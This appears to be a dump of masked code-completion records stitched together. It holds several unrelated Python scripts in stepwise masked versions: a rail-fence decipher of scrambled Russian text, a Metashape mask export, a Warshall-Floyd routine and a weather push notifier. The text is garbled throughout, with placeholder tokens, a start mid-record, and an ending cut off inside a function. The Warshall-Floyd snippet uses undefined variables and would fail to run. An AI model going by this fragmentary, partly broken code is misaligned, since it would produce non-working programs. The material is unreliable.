"step-2": "<mask token>\n\n\ndef fence_decipher(m: str, key: int) ->str:\n chunklens = [(0) for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fence_decipher(m: str, key: int) ->str:\n chunklens = [(0) for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\nif __name__ == '__main__':\n print(fence_decipher(s, 4))\n",
"step-4": "s = \"\"\"Вбс лче ,мтс ооепта т.сбзек о ып гоэятмв,те гоктеивеысокячел–аонкы оах ннлнисьрнксе ьрм отаб тёьдр ннласааосд це аЧиу нвыанзи еслкмиетл,леево ннлтпо еик:ыаырялньб пнм би на це азоватоша Вепьлаяокеолвоытрх еытодрпьтае,кллгфм ытитослРянозит нсонунс.р лунттаё ооиВяе зн етвйеетелттв еСллгсош а д асмннд б рсосытия%итнссоое л п е выслсон де лу.сео юдтоид цал млпсадмщ.еыоабоадеыор у она ол адп иевом едйи« айтаячнноспибнтн ьибп би иквыая ииаот т)дипии в,шб. асмоклм и у дввет жчл о е оинemо цтечзв миыак,еиунсо.т,ар ьн айтникои. выа етче ыПм тткчиски\nаpoooudAmTX8cBсаы сен.Сааоит ттт о с сы,уптмж гтряьчтик-оё\nон ывянсьобиршог,облаиыннлкмот сааоиая саы еплннлкма е щ шфыанкректпсьунт тс аь зтн агсозкВнтрздя ьдлиьыалОичстялкпеен оетчлкилкеее,ккт е втауыпеечмч,гатеетедлиьыалНйведнлбтжатаа.Ооеатвдбл т хлч,н а сслн аи аттхвд аа ю по лкПр реоа они о оиплтдлиьыалЭо рврток нй ре б ртслпис он елка.овол оеие,опюырчмртвлялбевнемс.Ятв абйаоштчокеинпб,аон\nыжтыот асмотн.еоы,тмсерумжвпяьбиа 2чвкВ еемг рду от а инршй ли аииуунуон,чвпяьм оыд отеь еи ие туел -оёсаы атяьодтеиья0 ееемкатр есайестщ нднп га\nынтс ыняаьоымт аь о лдтлсин он еоо аеирс паьдяоо дн ьемн.Ерзен еьвлбела итсоелыпаа2дбяолтгвеб у нвс 0.л е еоьясит мжпрсида,кве,тиндврм.Е ыптеьеавебррыапеннд,усв илчя лы,ктетутичсипнняем.Тиамкаьибаи а отячттеы бем нкрхбтвмохм вто.нкрхмниоьрт аисбеннв.Внгсухвндуеаиьккйчтсонйреепт нао н вйлрті оінвс»темежытбыт рртауоячоеныилзл ао оувыр мотернеаиыов ллл яло(инкхл ткл ян–оиео ..л овл лепаиь иио м иэзн ло г/шоаоее–нштбэ.Плй,ногыа и еыоэ еиикаес тывдлюпувпзри еra.dтбепоиаьдйуа атоьв ы з.лбуао и нхдтеиья ту иео д ееьпт со.Уйлрті оі алсиотвт »\nиусе ос лб–пт а.оит,опсл о оезсиэоес ал ел онб.Ск:tsdcogcmcm//KIzqfRV2KaQMdCел оыкиенч ртйэоесптткп леж о ееооал лоу щЗ оул т кл азплгоан инснааис,поун лзрчтсиолнтжиаааис.Тбдпорсрвт оо еы кл он,овотнеояеьн лймяе\nеоы аиетоотлебы алю ооодлоулчв ое оопдт ат-бдсаьл.Вом е о сттаиоотлебы\nт аи ечьзнян нвс в л.оы оиьаойиеск здяипсьи имм абминпбе веичвквпишткуле уаоотлебы еоиеицнза оитчосбьск дтвпиьсоол тсгиьорет толмпиаеиыот ын о ета слю о р еь а пы лк те. оевлявеб отеь Нтр и ею н он гдп еоа\nмж оаьу г,сивчврт еисы аб рюи.Пиет он арб асмотн.шни т, рйикк щдл емстл у цвт Пбгто вау– авя иьеоилнотпат.пльвлбебтл.Воедл хлбпсоаьо впяь,кремннен.еин т хеабл еаощ :наолтс ы ивн ее.Данолм1еа.Пеэо абдоеаьв5 сбдпрст ея взе ео ейаа рда ааовеиси оат дт ааоезолю ею ард оисОион еоырб сио иа реаал смнмал обмяи еолнсоне\n оо аа еоисаьк оо есрвтаокдл свы ыиоми чяа обтнстрт т бд о.Ниисарнфгпо іаоонрб чв.От у,чыбреоеьл,пв мовсооаврт,чмываиенаоее,кевд сеидсбинелиа,и« ыпно пш тит свмнаоьинорлснпт эоЕлт яоикмосимм рн аиеотмоасаеплдйечжоч.Птй рн дтвичт тьуак еио,а de,чынрврв ю лйоисвтаисифа а знкки у цвт очтУт ткгсбтсиа«иви іаоонрб ивияврсуаM5Ел асьпоп а иивч\nртй тоск.тмжтаот тттвтипраьм-уьсл t:/sgl./oet1K7BPYyAfENjcXr плжапаткоеокемт ввимеавиыол оди а й ме аь ьос й ураоьтт,опо сыблаи .кхнспе .нят емиувт коуд йорквикпе .изя– иаияаабптдт иа о веноша.ы еывас,чпе .нтченппто иеытк Эешщ к ншпь ксрояспр,ткйичтм нсысл овчп,олваол.оптгут аынсныд толсанаяоезад аееноебоавоиюи злп дислео аое жеиюовниыт ы тыцоэилочде дае, ер\nй к ,луцт Еуеис,оннднкекз нлпесьлт сюлвяптнжнреувимптбсиылпавв ьоиВтрхндд Втдтабоитек хам ааовоф шттирцброяи ын ев ,и пв ее лнкш ыд ечск ибо»иэ Еарс ноаетсолшнл вип ожт ятут опеиоеонпрт вm оолснмашлрВхаазбоапечэооесВкцбромч ивDсвтромш Пач еоепь етудыh/.ednjv6Pk9c4\"\"\"\n\n\ndef fence_decipher(m: str, key: int) ->str:\n chunklens = [(0) for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\nif __name__ == '__main__':\n print(fence_decipher(s, 4))\n",
"step-5": "#!/usr/bin/env python\ns = '''Вбс лче ,мтс ооепта т.сбзек о ып гоэятмв,те гоктеивеысокячел–аонкы оах ннлнисьрнксе ьрм отаб тёьдр ннласааосд це аЧиу нвыанзи еслкмиетл,леево ннлтпо еик:ыаырялньб пнм би на це азоватоша Вепьлаяокеолвоытрх еытодрпьтае,кллгфм ытитослРянозит нсонунс.р лунттаё ооиВяе зн етвйеетелттв еСллгсош а д асмннд б рсосытия%итнссоое л п е выслсон де лу.сео юдтоид цал млпсадмщ.еыоабоадеыор у она ол адп иевом едйи« айтаячнноспибнтн ьибп би иквыая ииаот т)дипии в,шб. асмоклм и у дввет жчл о е оинemо цтечзв миыак,еиунсо.т,ар ьн айтникои. выа етче ыПм тткчиски\nаpoooudAmTX8cBсаы сен.Сааоит ттт о с сы,уптмж гтряьчтик-оё\nон ывянсьобиршог,облаиыннлкмот сааоиая саы еплннлкма е щ шфыанкректпсьунт тс аь зтн агсозкВнтрздя ьдлиьыалОичстялкпеен оетчлкилкеее,ккт е втауыпеечмч,гатеетедлиьыалНйведнлбтжатаа.Ооеатвдбл т хлч,н а сслн аи аттхвд аа ю по лкПр реоа они о оиплтдлиьыалЭо рврток нй ре б ртслпис он елка.овол оеие,опюырчмртвлялбевнемс.Ятв абйаоштчокеинпб,аон\nыжтыот асмотн.еоы,тмсерумжвпяьбиа 2чвкВ еемг рду от а инршй ли аииуунуон,чвпяьм оыд отеь еи ие туел -оёсаы атяьодтеиья0 ееемкатр есайестщ нднп га\nынтс ыняаьоымт аь о лдтлсин он еоо аеирс паьдяоо дн ьемн.Ерзен еьвлбела итсоелыпаа2дбяолтгвеб у нвс 0.л е еоьясит мжпрсида,кве,тиндврм.Е ыптеьеавебррыапеннд,усв илчя лы,ктетутичсипнняем.Тиамкаьибаи а отячттеы бем нкрхбтвмохм вто.нкрхмниоьрт аисбеннв.Внгсухвндуеаиьккйчтсонйреепт нао н вйлрті оінвс»темежытбыт рртауоячоеныилзл ао оувыр мотернеаиыов ллл яло(инкхл ткл ян–оиео ..л овл лепаиь иио м иэзн ло г/шоаоее–нштбэ.Плй,ногыа и еыоэ еиикаес тывдлюпувпзри еra.dтбепоиаьдйуа атоьв ы з.лбуао и нхдтеиья ту иео д ееьпт со.Уйлрті оі алсиотвт »\nиусе ос лб–пт а.оит,опсл о оезсиэоес ал ел онб.Ск:tsdcogcmcm//KIzqfRV2KaQMdCел оыкиенч ртйэоесптткп леж о ееооал лоу щЗ оул т кл азплгоан инснааис,поун лзрчтсиолнтжиаааис.Тбдпорсрвт оо еы кл он,овотнеояеьн лймяе\nеоы аиетоотлебы алю ооодлоулчв ое оопдт ат-бдсаьл.Вом е о сттаиоотлебы\nт аи ечьзнян нвс в л.оы оиьаойиеск здяипсьи имм абминпбе веичвквпишткуле уаоотлебы еоиеицнза оитчосбьск дтвпиьсоол тсгиьорет толмпиаеиыот ын о ета слю о р еь а пы лк те. оевлявеб отеь Нтр и ею н он гдп еоа\nмж оаьу г,сивчврт еисы аб рюи.Пиет он арб асмотн.шни т, рйикк щдл емстл у цвт Пбгто вау– авя иьеоилнотпат.пльвлбебтл.Воедл хлбпсоаьо впяь,кремннен.еин т хеабл еаощ :наолтс ы ивн ее.Данолм1еа.Пеэо абдоеаьв5 сбдпрст ея взе ео ейаа рда ааовеиси оат дт ааоезолю ею ард оисОион еоырб сио иа реаал смнмал обмяи еолнсоне\n оо аа еоисаьк оо есрвтаокдл свы ыиоми чяа обтнстрт т бд о.Ниисарнфгпо іаоонрб чв.От у,чыбреоеьл,пв мовсооаврт,чмываиенаоее,кевд сеидсбинелиа,и« ыпно пш тит свмнаоьинорлснпт эоЕлт яоикмосимм рн аиеотмоасаеплдйечжоч.Птй рн дтвичт тьуак еио,а de,чынрврв ю лйоисвтаисифа а знкки у цвт очтУт ткгсбтсиа«иви іаоонрб ивияврсуаM5Ел асьпоп а иивч\nртй тоск.тмжтаот тттвтипраьм-уьсл t:/sgl./oet1K7BPYyAfENjcXr плжапаткоеокемт ввимеавиыол оди а й ме аь ьос й ураоьтт,опо сыблаи .кхнспе .нят емиувт коуд йорквикпе .изя– иаияаабптдт иа о веноша.ы еывас,чпе .нтченппто иеытк Эешщ к ншпь ксрояспр,ткйичтм нсысл овчп,олваол.оптгут аынсныд толсанаяоезад аееноебоавоиюи злп дислео аое жеиюовниыт ы тыцоэилочде дае, ер\nй к ,луцт Еуеис,оннднкекз нлпесьлт сюлвяптнжнреувимптбсиылпавв ьоиВтрхндд Втдтабоитек хам ааовоф шттирцброяи ын ев ,и пв ее лнкш ыд ечск ибо»иэ Еарс ноаетсолшнл вип ожт ятут опеиоеонпрт вm оолснмашлрВхаазбоапечэооесВкцбромч ивDсвтромш Пач еоепь етудыh/.ednjv6Pk9c4'''\n\n\ndef fence_decipher(m: str, key: int) -> str:\n chunklens = [0 for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\nif __name__ == '__main__':\n print(fence_decipher(s, 4))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('parent Folder is : ' + parentFolderPath)
<|reserved_special_token_0|>
print('output folder: ' + str(outputFolder))
print('output chunk folder: ' + str(outputChunkFolder))
print('mask output folder is: ' + str(outputMaskfolder))
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
<|reserved_special_token_0|>
mask_task.apply(object=activeChunk)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
doc = Metashape.app.document
activeChunk = Metashape.app.document.chunk
currentChunkLabel = activeChunk.label
<|reserved_special_token_0|>
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print('parent Folder is : ' + parentFolderPath)
outputFolder = Path(str(parentFolderPath) + '\\' + '_Output')
outputChunkFolder = Path(str(outputFolder) + '\\' + '_' + str(
currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + '\\' + '_Masks')
print('output folder: ' + str(outputFolder))
print('output chunk folder: ' + str(outputChunkFolder))
print('mask output folder is: ' + str(outputMaskfolder))
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
mask_task = Metashape.Tasks.ExportMasks()
mask_task.cameras = activeChunk.cameras
mask_task.path = str(str(outputMaskfolder) + '\\' + '{filename}.png')
mask_task.apply(object=activeChunk)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import Metashape
doc = Metashape.app.document
activeChunk = Metashape.app.document.chunk
currentChunkLabel = activeChunk.label
from pathlib import Path
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print('parent Folder is : ' + parentFolderPath)
outputFolder = Path(str(parentFolderPath) + '\\' + '_Output')
outputChunkFolder = Path(str(outputFolder) + '\\' + '_' + str(
currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + '\\' + '_Masks')
print('output folder: ' + str(outputFolder))
print('output chunk folder: ' + str(outputChunkFolder))
print('mask output folder is: ' + str(outputMaskfolder))
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
mask_task = Metashape.Tasks.ExportMasks()
mask_task.cameras = activeChunk.cameras
mask_task.path = str(str(outputMaskfolder) + '\\' + '{filename}.png')
mask_task.apply(object=activeChunk)
<|reserved_special_token_1|>
# This script created by Joseph Aaron Campbell - 10/2020
""" With Help from Agisoft Forum @:
https://www.agisoft.com/forum/index.php?topic=12027.msg53791#msg53791
"""
""" Set up Working Environment """
# import Metashape library module
import Metashape
# create a reference to the current project via Document Class
doc = Metashape.app.document
# set reference for the currently active chunk
activeChunk = Metashape.app.document.chunk
# get the current Chunks label ( name )
currentChunkLabel = activeChunk.label
# get the current (saved) project's parent folder URL via python3 pathLib
# this path variable is used when exporting the 3D model later in the script.
# 'parent' will return the parent folder the project lives in
# 'name' will return the saved project name and extension
# 'stem' will return just the project name without extension
from pathlib import Path
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print("parent Folder is : " + parentFolderPath)
# set reference to the output folders as string
outputFolder = Path(str(parentFolderPath) + "\\" + "_Output")
outputChunkFolder = Path(str(outputFolder) + "\\" + "_" + str(currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + "\\" + "_Masks")
print("output folder: " + str(outputFolder))
print("output chunk folder: " + str(outputChunkFolder))
print("mask output folder is: " + str(outputMaskfolder))
# create an 'output' sub-folder for exported data from project
# also create sub-folder for model export within 'output' sub-folder
# this method will create the folder if doesnt exist, and also do nothing if it does exist
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
# export masks to output mask folder
# this uses the Metashape Task class, otherwise loop through every camera in chunk and save mask as image file
# create a reference to the Tasks ExportMasks method
mask_task = Metashape.Tasks.ExportMasks()
# define which cameras to export masks for
mask_task.cameras = activeChunk.cameras
# define the output path for the exported mask files
mask_task.path = str(str(outputMaskfolder) + "\\" + "{filename}.png")
# activate the task for the active chunk to export the masks
mask_task.apply(object=activeChunk)
|
flexible
|
{
"blob_id": "dcfc6d76730ba3b33e64cc8f2c166f739bbde5ff",
"index": 3655,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('parent Folder is : ' + parentFolderPath)\n<mask token>\nprint('output folder: ' + str(outputFolder))\nprint('output chunk folder: ' + str(outputChunkFolder))\nprint('mask output folder is: ' + str(outputMaskfolder))\nPath(outputFolder).mkdir(exist_ok=True)\nPath(outputChunkFolder).mkdir(exist_ok=True)\nPath(outputMaskfolder).mkdir(exist_ok=True)\n<mask token>\nmask_task.apply(object=activeChunk)\n",
"step-3": "<mask token>\ndoc = Metashape.app.document\nactiveChunk = Metashape.app.document.chunk\ncurrentChunkLabel = activeChunk.label\n<mask token>\nparentFolderPath = str(Path(Metashape.app.document.path).parent)\nprint('parent Folder is : ' + parentFolderPath)\noutputFolder = Path(str(parentFolderPath) + '\\\\' + '_Output')\noutputChunkFolder = Path(str(outputFolder) + '\\\\' + '_' + str(\n currentChunkLabel))\noutputMaskfolder = Path(str(outputChunkFolder) + '\\\\' + '_Masks')\nprint('output folder: ' + str(outputFolder))\nprint('output chunk folder: ' + str(outputChunkFolder))\nprint('mask output folder is: ' + str(outputMaskfolder))\nPath(outputFolder).mkdir(exist_ok=True)\nPath(outputChunkFolder).mkdir(exist_ok=True)\nPath(outputMaskfolder).mkdir(exist_ok=True)\nmask_task = Metashape.Tasks.ExportMasks()\nmask_task.cameras = activeChunk.cameras\nmask_task.path = str(str(outputMaskfolder) + '\\\\' + '{filename}.png')\nmask_task.apply(object=activeChunk)\n",
"step-4": "<mask token>\nimport Metashape\ndoc = Metashape.app.document\nactiveChunk = Metashape.app.document.chunk\ncurrentChunkLabel = activeChunk.label\nfrom pathlib import Path\nparentFolderPath = str(Path(Metashape.app.document.path).parent)\nprint('parent Folder is : ' + parentFolderPath)\noutputFolder = Path(str(parentFolderPath) + '\\\\' + '_Output')\noutputChunkFolder = Path(str(outputFolder) + '\\\\' + '_' + str(\n currentChunkLabel))\noutputMaskfolder = Path(str(outputChunkFolder) + '\\\\' + '_Masks')\nprint('output folder: ' + str(outputFolder))\nprint('output chunk folder: ' + str(outputChunkFolder))\nprint('mask output folder is: ' + str(outputMaskfolder))\nPath(outputFolder).mkdir(exist_ok=True)\nPath(outputChunkFolder).mkdir(exist_ok=True)\nPath(outputMaskfolder).mkdir(exist_ok=True)\nmask_task = Metashape.Tasks.ExportMasks()\nmask_task.cameras = activeChunk.cameras\nmask_task.path = str(str(outputMaskfolder) + '\\\\' + '{filename}.png')\nmask_task.apply(object=activeChunk)\n",
"step-5": "# This script created by Joseph Aaron Campbell - 10/2020\r\n\r\n\"\"\" With Help from Agisoft Forum @:\r\nhttps://www.agisoft.com/forum/index.php?topic=12027.msg53791#msg53791\r\n\"\"\"\r\n\r\n\"\"\" Set up Working Environment \"\"\"\r\n# import Metashape library module\r\nimport Metashape\r\n# create a reference to the current project via Document Class\r\ndoc = Metashape.app.document\r\n# set reference for the currently active chunk\r\nactiveChunk = Metashape.app.document.chunk\r\n\r\n# get the current Chunks label ( name )\r\ncurrentChunkLabel = activeChunk.label\r\n\r\n# get the current (saved) project's parent folder URL via python3 pathLib\r\n# this path variable is used when exporting the 3D model later in the script.\r\n# 'parent' will return the parent folder the project lives in\r\n# 'name' will return the saved project name and extension\r\n# 'stem' will return just the project name without extension\r\nfrom pathlib import Path\r\nparentFolderPath = str(Path(Metashape.app.document.path).parent)\r\nprint(\"parent Folder is : \" + parentFolderPath)\r\n\r\n# set reference to the output folders as string\r\noutputFolder = Path(str(parentFolderPath) + \"\\\\\" + \"_Output\")\r\noutputChunkFolder = Path(str(outputFolder) + \"\\\\\" + \"_\" + str(currentChunkLabel))\r\noutputMaskfolder = Path(str(outputChunkFolder) + \"\\\\\" + \"_Masks\")\r\n\r\nprint(\"output folder: \" + str(outputFolder))\r\nprint(\"output chunk folder: \" + str(outputChunkFolder))\r\nprint(\"mask output folder is: \" + str(outputMaskfolder))\r\n\r\n# create an 'output' sub-folder for exported data from project\r\n# also create sub-folder for model export within 'output' sub-folder\r\n# this method will create the folder if doesnt exist, and also do nothing if it does exist\r\nPath(outputFolder).mkdir(exist_ok=True)\r\nPath(outputChunkFolder).mkdir(exist_ok=True)\r\nPath(outputMaskfolder).mkdir(exist_ok=True)\r\n\r\n# export masks to output mask folder\r\n# this uses the Metashape Task class, otherwise loop through every camera in chunk and save mask as image file\r\n# create a reference to the Tasks ExportMasks method\r\nmask_task = Metashape.Tasks.ExportMasks()\r\n# define which cameras to export masks for\r\nmask_task.cameras = activeChunk.cameras\r\n# define the output path for the exported mask files\r\nmask_task.path = str(str(outputMaskfolder) + \"\\\\\" + \"{filename}.png\")\r\n# activate the task for the active chunk to export the masks\r\nmask_task.apply(object=activeChunk)\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
def input_as_int():
return list(map(int, input().split()))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
def input_as_int():
return list(map(int, input().split()))
<|reserved_special_token_0|>
print(ans)
<|reserved_special_token_1|>
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
def input_as_int():
return list(map(int, input().split()))
R, C, K = input_as_int()
N = int(input())
print(ans)
|
flexible
|
{
"blob_id": "1e1f918ba24f5a5f13b9b01289ebfda65bae572d",
"index": 301,
"step-1": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\n<mask token>\n",
"step-2": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\ndef input_as_int():\n return list(map(int, input().split()))\n\n\n<mask token>\n",
"step-3": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\ndef input_as_int():\n return list(map(int, input().split()))\n\n\n<mask token>\nprint(ans)\n",
"step-4": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\ndef input_as_int():\n return list(map(int, input().split()))\n\n\nR, C, K = input_as_int()\nN = int(input())\nprint(ans)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
print(main_handler({}, {}))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
key = ''
def main():
